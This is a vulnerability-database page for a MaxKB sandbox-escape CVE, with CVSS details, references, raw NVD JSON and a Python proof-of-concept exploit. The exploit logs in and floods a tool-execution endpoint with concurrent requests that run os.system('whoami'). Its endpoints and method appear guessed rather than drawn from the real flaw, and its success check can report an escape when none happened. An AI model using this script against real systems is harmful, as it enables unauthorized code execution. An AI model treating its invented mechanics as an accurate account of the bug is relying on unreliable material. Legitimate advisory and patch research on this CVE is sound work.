CVE-2025-66419

Description

MaxKB is an open-source AI assistant for enterprise. In versions 2.3.1 and below, the tool module allows an attacker to escape the sandbox environment and escalate privileges under certain concurrent conditions. This issue is fixed in version 2.4.0.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:maxkb:maxkb:*:*:*:*:-:*:*:* - VULNERABLE

MaxKB <= 2.3.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-66419 MaxKB Sandbox Escape PoC # Target: MaxKB <= 2.3.1 # Type: Sandbox Escape via Race Condition import requests import json import time import threading TARGET_URL = "http://target-server:8080" USERNAME = "[email protected]" PASSWORD = "password123" def get_auth_token(): """Authenticate and get access token""" login_url = f"{TARGET_URL}/api/auth/login" data = { "username": USERNAME, "password": PASSWORD } response = requests.post(login_url, json=data) return response.json().get('access_token') def send_malicious_request(token, payload_id): """Send malicious tool request with crafted payload""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Crafted payload to exploit race condition malicious_payload = { "tool_name": "code_executor", "parameters": { "code": f"__import__('os').system('whoami')", "context_id": f"context_{payload_id}" } } url = f"{TARGET_URL}/api/tools/execute" try: response = requests.post(url, json=malicious_payload, headers=headers, timeout=5) return response.json() except Exception as e: return {"error": str(e)} def exploit_sandbox_escape(): """Main exploitation function using race condition""" print("[*] Starting CVE-2025-66419 exploitation...") # Step 1: Authenticate token = get_auth_token() if not token: print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Launch concurrent requests to trigger race condition threads = [] results = [] for i in range(50): t = threading.Thread(target=lambda idx: results.append(send_malicious_request(token, idx)), args=(i,)) threads.append(t) t.start() time.sleep(0.001) # Small delay to increase race condition probability for t in threads: t.join() # Step 3: Analyze results for successful exploitation for result in results: if result and 'data' in result: output = result.get('data', {}).get('output', '') if 'root' in output or 'www-data' in output or not result.get('error'): print("[+] Sandbox escape potentially successful!") print(f"[+] Output: {output}") return True print("[-] Exploitation did not succeed") return False if __name__ == "__main__": exploit_sandbox_escape()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66419
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66419
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66419/
[4] VulDB https://vuldb.com/cve/CVE-2025-66419
[5] https://github.com/1Panel-dev/MaxKB/commit/f8ada9a110c4dbef8c3c2636c78847ecd621ece7
[6] https://github.com/1Panel-dev/MaxKB/releases/tag/v2.4.0
[7] https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-f9qm-2pxq-fx6c

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66419", "sourceIdentifier": "[email protected]", "published": "2025-12-11T22:15:55.817", "lastModified": "2025-12-15T18:05:09.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MaxKB is an open-source AI assistant for enterprise. In versions 2.3.1 and below, the tool module allows an attacker to escape the sandbox environment and escalate privileges under certain concurrent conditions. This issue is fixed in version 2.4.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:maxkb:maxkb:*:*:*:*:-:*:*:*", "versionEndExcluding": "2.4.0", "matchCriteriaId": "E28BF7E2-E3AC-4B21-BE1A-18D1E24691A4"}]}]}], "references": [{"url": "https://github.com/1Panel-dev/MaxKB/commit/f8ada9a110c4dbef8c3c2636c78847ecd621ece7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/1Panel-dev/MaxKB/releases/tag/v2.4.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-f9qm-2pxq-fx6c", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}